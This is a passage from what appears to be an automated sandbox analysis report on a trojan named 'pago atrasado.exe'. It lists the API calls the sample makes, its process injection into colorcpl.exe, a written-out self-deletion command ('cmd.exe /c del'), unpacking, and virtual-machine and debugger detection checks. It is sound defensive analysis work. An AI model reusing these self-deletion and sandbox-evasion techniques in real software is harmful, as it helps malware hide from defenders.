          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B02D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1BD45
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0453B150 appears 32 times
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: String function: 009CB150 appears 35 times
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004185CA NtCreateFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041867A NtReadFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004186FB NtClose,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A10 NtQuerySection,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09560 NtWriteFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0A770 NtOpenThread,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_00418700 NtClose,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_004187B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579560 NtWriteFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B18680 NtReadFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B187B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B18700 NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B185D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B186FB NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1867A NtReadFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B185CA NtCreateFile,
          Source: pago atrasado.exe, 00000000.00000003.244765966.000000000F1B6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
          Source: pago atrasado.exe, 00000001.00000003.248962710.0000000000786000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
          Source: pago atrasado.exe, 00000001.00000002.327286991.0000000002973000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs pago atrasado.exe
          Source: C:\Users\user\Desktop\pago atrasado.exeFile read: C:\Users\user\Desktop\pago atrasado.exeJump to behavior
          Source: pago atrasado.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\pago atrasado.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Users\user\Desktop\pago atrasado.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\pago atrasado.exeFile created: C:\Users\user\AppData\Local\Temp\nsb7E27.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@12/5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\pago atrasado.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: colorcpl.pdbGCTL source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pago atrasado.exe, colorcpl.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\pago atrasado.exeUnpacked PE file: 1.2.pago atrasado.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1000A4F5 push ecx; ret
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041C951 push FFFFFFA3h; ret
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00404F18 push edi; retf
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041B7C5 push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A1D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_0041C951 push FFFFFFA3h; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0458D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1B812 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1B81B push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1B87C push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1C951 push FFFFFFA3h; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1B7C5 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B04F18 push edi; retf
          Source: C:\Users\user\Desktop\pago atrasado.exeFile created: C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10008826 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\pago atrasado.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\pago atrasado.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000002B08604 second address: 0000000002B0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000002B0898E second address: 0000000002B08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5660Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 5860Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: explorer.exe, 00000002.00000000.275739014.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.312138109.000000000113D000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.275739014.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.312469410.00000000011B3000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000002.00000000.312469410.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.275782564.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.315993694.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.275782564.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.290685274.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: Prod_VMware_SATA*6
          Source: explorer.exe, 00000002.00000000.276079077.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: AProd_VMware_SATA*6
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1000CDA2 IsDebuggerPresent,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100093E8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100098B2 GetProcessHeap,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A6C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_1001A744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A469A6 mov eax, dword ptr fs:[00000030h]
